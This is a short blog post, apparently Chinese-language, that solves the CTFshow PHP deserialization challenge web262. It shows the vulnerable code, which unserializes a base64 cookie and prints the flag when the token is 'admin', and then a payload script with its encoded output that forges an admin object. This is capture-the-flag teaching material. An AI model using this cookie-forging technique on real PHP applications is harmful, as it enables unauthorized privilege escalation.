11. CTFshow 反序列化 web262

一、代码

<?php


*/
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_COOKIE['msg']));  //1. 先base64解密，在反序列化。
    if($msg->token=='admin'){  //2. msg对象的token=admin输出flag
        echo $flag;
    }
}

二、解题步骤

直接在类里修改public $token='admin';
然后在反序列化，然后在进行base64编码。

三、payload

<?php

class message{
    public $token='admin';
}

$user = new message();
echo base64_encode(serialize($user));
//Tzo3OiJtZXNzYWdlIjoxOntzOjU6InRva2VuIjtzOjU6ImFkbWluIjt9

posted @ 2023-02-03 11:28 LuckMeteor 阅读(166) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

LuckMeteor

11. CTFshow 反序列化 web262

一、代码

二、解题步骤

三、payload

公告